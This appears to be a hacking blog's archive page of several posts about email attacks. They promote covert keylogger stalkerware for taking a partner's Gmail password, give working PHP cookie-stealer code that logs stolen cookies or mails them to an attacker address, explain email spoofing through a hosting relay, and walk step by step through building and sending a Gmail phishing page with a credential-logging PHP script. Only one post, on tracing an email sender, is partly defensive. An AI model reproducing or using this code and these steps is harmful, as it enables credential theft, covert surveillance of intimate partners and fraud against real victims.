Showing posts with label Emails. Show all posts
Showing posts with label Emails. Show all posts

02/12/2014

How to Hack a Gmail Password: Gmail Hacking Secrets


With Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages.
Read Also:-How to Use Ravan for Cracking Password
Therefore, in order to reveal the secret, it becomes inevitable for people to hack the Gmail password of their loved ones.

Possible Ways to Hack Gmail Password
Today, most websites on the Internet give out false or outdated password hacking methods that completely mislead the readers. I have also seen a few top ranking websites making false promises to hack any Gmail password and urge users to take-up surveys. Remember, this is just a honeypot setup by the website owner only to earn money where no Gmail password will be delivered to users upon survey completion. However, on this blog we strive hard to present readers with true and accurate information that actually work. With many years of my experience in the field of information security, I can tell you that the following are the only two ways to hack Gmail password.

1. Keylogging
Easiest Way to Hack Gmail Password Keylogging is by far the easiest way to gain access to any Gmail account. Keylogging involves the use of a small software program called the keylogger. This keylogger when installed on a given computer will capture each and every keystroke typed on the keyboard including all types of passwords.
Does a Keylogger Require Any Special Knowledge?
No, absolutely not! Keyloggers are designed in such a way that even the first time users also find it easy to install and control. Anyone with a basic knowledge of computer can use it with ease.
Is it Possible to Detect a Keylogger?
Right after the installation process is completed, the keylogger goes completely hidden and continues to work in the background. Hence, it is impossible for the users of the computer to know about its presence.
What if I do not have Physical Access to the Target Computer?
Well, you need not worry as I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the Realtime-Spy keylogger as the best
Realtime-Spy: I'm not going to give you the direct downloading link of Realtime-Spy otherwise i'll be considered as a present hacker, you can download it internet.
Top Features of Realtime-Spy:
*. REMOTE AND LOCAL INSTALLATION
The product supports installation on remote as well as a local computer.
*. EXTREMELY EASY TO INSTALL
Realtime-Spy is very small in size and can be installed with just a click of a button.
*. NEVER GET CAUGHT
This product runs in a total stealth mode so that you need not worry about being caught or traced back.
*. ACCESS ANY PASSWORD
This product can be used to hack Gmail or any other online password.
*. WORKS ON WINDOWS AND MAC
Fully compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.
You get a detailed step-by-step instruction and technical support after your purchase. So, go grab Realtime-Spy now and expose the truth.

What About Mobile Devices?
For cell phone devices, there is a mobile version of the same program called mSpy which you can download from the internet.
Supported Devices: Android, Windows Mobile, BlackBerry, iPhone and iPads.

2. Phishing
Difficult Way for begginers, Phishing is a way to capture sensitive information such as usernames, passwords and credit card details. Phishing usually involves the use of a spoofed web page (or a fake website) whose look and feel is almost identical to that of the legitimate websites like Gmail, Yahoo and Hotmail. When the users try to login from these fake pages and enter their passwords there, the login details are stolen away by the hacker.
However, creating a fake login page and taking it online to successfully hack the password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. In addition to that, carrying out a phishing attack is a serious criminal offence. So, if you are new to the concept of hacking passwords, then I only recommend using the keyloggers as they are the easiest the safest way to hack Gmail or any online password.

14/11/2014

How To Create Cookie Stealer Coding In PHP Get Via Email


Before you create Cookie stealer, it's important to know What are Cookies?

Here is the simple Cookie Stealer code
Cookie stored in File:
<?php $cookie = $HTTP_GET_VARS["cookie"]; $steal = fopen("cookiefile.txt", "a"); fwrite($steal, $cookie ."\\n"); fclose($steal); ?>$cookie = $HTTP_GET_VARS["cookie"];steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen("cookiefile.txt", "a"); This open the cookie file in append mode so that we can append the stolen cookie. fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file. fclose($steal);close the opened file.

Another version Sends cookies to the hacker mail
<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@ mailprovider.com", "Stolen Cookies", $cookie); ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

Third Version
<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?> The above Cookie stealer will store the following information:
*. Ip address
*. port number
*. host(usually computer-name)
*. user agent
*. cookie
This site contains materials that can be potentially damaging or dangerous. If you are looking to comment a crime, you must leave this Page/site now! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW!
Love this article?
Share it with your friends on Facebook

08/11/2014

How to Find the Person Who is Behind an Email Address


You have received an email from a person with whom you have never interacted earlier and claiming that you have won some prize or amount in a lucky draw or maybe you’ve received an email that looks quite interesting. How do you do this without directly asking the other person? Before you can trust the sender via email and before sending your reply, it’s important that you properly identify the person who is associated with this email.
There are usually two methods that may be used to confirm the identity of a person associated to an email address. You can either use the sender’s email address or use the IP address of that email address to point out the possible location where it originated from. In this post, we’ll go over some methods based on tips and tricks to reveal the possible person behind the email address which have sent you an email.

Googling
Searching on Google as the first step. Copy the email address of sender and paste it in the Google search bar. If it is a scam or fraud, then there is a strong chance that you will find some information about it. If you don’t find any information on Google about the sender email and it appears to be a legitimate one, proceed with the tips mentioned ahead for the confirmation.
Indications of legitimacy: If you’re questioning the legitimacy of a particular email, here are some things to look out for that may indicate whether it’s real or fake:
The email address of the sender doesn’t match the website address of an organization through which he/she is claiming an offer.
The email is sent from a free web mail address.
Your name isn’t properly used in the email.
The email contains a sense of urgency regarding your reply or response.
The email contains a website link and you are asked to click on it. This link may be forged or may appear similar to the proper address (a minor spelling mistake makes it different altogether) of some legitimate web site and asks you to enter your personal information such as username, passwords, etc. These points will help you to make an educated guess that whether the sender is a real person or a fake person pretending to be real.
Read Also Phishing and it's defenses

Facebooking
To Confirm the Identity of A Person. According to Wikipedia Currently, Facebook has approximately 1.3 billion active users and an email address is required to become a registered Facebook user. So, there is a strong chance that you may find the owner of email address through Facebook. Simply, copy and paste the email address of the sender into the Facebook search bar and hit the search button. It will show you the profile associated with that email address. There is also a chance that you’ll get nothing in the search results.There are many fake Facebook profiles and you have to keep this in mind too. Scrolling through the timeline of a particular profile can help you figure out with ease whether the profile is real or fake.

Locate Email IP Address
An email does not only contain the information in the content but there’s also useful information that is not visible at first glance. This information contains the IP address of the sender as well. You can use this IP address to determine the country and city of the sender to get a better idea of sender's location.
To extract the IP address, open up the email header by clicking on the ‘Reply’ button and then click on ‘Show Original’ Once the email header is accessed then locate Received: From and you will find the IP address nearby it. Copy the IP address and paste it in IP address search bar of IP Location such as IP Location Finder-Geolocation to find the origin of the email.

Searching on all Famous Social Media Sites
Apart from Facebook, there are many other social media websites as well and you should check the email ID on all of them if you’re suspicious. If you start doing this task one by one on every social media website, then it will take a lot of time to go through all.

Search on Internet Directory
You can even use internet directories to search for people based on their emails. Pipl is one such free service that lets you reverse search for people based on their email addresses, phone numbers and names.
Share it with your friends on Facebook

07/11/2014

How to Send Spoofed Emails Anonymously


Most of us are very curious to know a method to send spoofed emails to our friends and family for fun. But the question is, is it possible to send spoofed emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send spoofed emails anonymously to your friends or family members. For example, you can send an email to your friend with the following sender details.
From: Bill Gates
The art of sending this kind of email is known as Email Spoofing. One of the easy way to send a spoofed email is by using our own local SMTP server. In the past, I have tried SMTP servers like QK SMTP server. This method used to work successfully in those days, but as of now, it has a very low success rate since Gmail and Yahoo (all major email service providers) blocks the emails that are sent directly from a home computer.

How to Send Spoofed Emails
In this post, I have come up with a new method of sending spoofed emails to anyone without having to worry about being blocked or filtered as spam. In order to accomplish this, all you’ve to do is use a “relay server” while sending the spoofed emails.

What is a Relay Server
In simple words, a relay server is an SMTP Server that is trusted by major companies as an authorized sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorized, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

How to Find a Relay Server
Now, all we have to do is find a trusted SMTP server so as to send spoofed emails successfully. Usually, all the emails that are sent from web hosting providers are trusted and authorized. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free web hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However, all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cake walk to send anonymous emails. All we have to do is just modify the email header to insert a fake From: address field into it. there is a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own anonymous email sender script:
1. Go to X10 Hosting and register a new account.
2. Download the script from the below link:
Download Anonymous Email Sender Script
3. Login to your Free Web Hosting Area Account and click on File Manager.
4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777
6. Now type the following URL:
http://yoursite.x10hosting.com/sendmail.php
7. Use the script to send spoofed emails anonymously to your friends and have fun.
Love this article?
Share it with your friends on Facebook

30/08/2014

How to create fake or Phishing web page for Gmail


This post will explain you how to create fake or phishing web page for Gmail This Procedure can be used to make fake page for other websites like yahoo MSN or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page
Read Also Phishing and it's  defenses
Step 1. Go to the Gmail Save the Page as complet HTML
Step 2. Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from Google files There will be two image files namely google_transparent.gif and mail_logo.png
Step 3. Upload those image to TinyPic or Photobucket copy the url of each image.
Step4. Open the HTML file in Wordpad and Search for google_transparent.gif and replace it with corresponding url. Now search for mail_logo.png and replace it with corresponding url.
Step 5. Search for the
action="https://www.google.com/accounts/ServiceLoginAuth
and replace it with action="http://yoursiteurlhere/login.php save the file.
Step 6. Now you need to create login.php so you need to open the notepad and type or copy the below codes:
<form action="/html/tags/html_form_tag_action.cfm" method="post">
<?php header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle =
fopen("pswrds.txt", "a"); foreach($_POST as
$variable => $value) {
fwrite($handle, $variable); fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n"); fclose($handle);
exit;
?>
Step 7. Open the notepad and just save the file as pswrds.txt without any contents.
Now upload those three files namely index.html login.php pswrds.txt in any of subdomain Web hosting site.
Note: Use one of these sites: 007sites Web Hosting
Just Free Website
110mb Free Web Hosting
Use these sites through the secure connection sites so that you can hide IP Address like: This Website or find more site for best secure connection.
Step 8. Create an email with Gmail keyword
Step 9. Send to victim similar to gmail starts new feature to use this service log in to this page from that Gmail ID with link to your Phishing Web Page
Note: For user to believe change Your phishing web page url with any of free shortened url sites. This will make users to believe that it is correct url.
Love this article?
Share it with your friends on Facebook